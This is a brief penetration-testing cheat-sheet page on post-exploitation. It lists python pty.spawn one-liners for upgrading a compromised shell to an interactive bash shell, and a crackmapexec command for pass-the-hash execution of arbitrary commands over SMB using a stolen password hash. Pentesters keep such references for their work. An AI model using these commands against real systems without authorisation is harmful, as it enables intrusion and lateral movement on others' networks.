Post Exploitation

Upgrade to usable shell

which python
# Depending which python version
python -c 'import pty; pty.spawn("/bin/bash")' upgrade shell

python3 -c 'import pty; pty.spawn("/bin/bash")' upgrade shell

Pass-The-Hash

Crackmapexec

crackmapexec smb (ip) -u (user) -H (userhash) -x '(command to execute)'

Last updated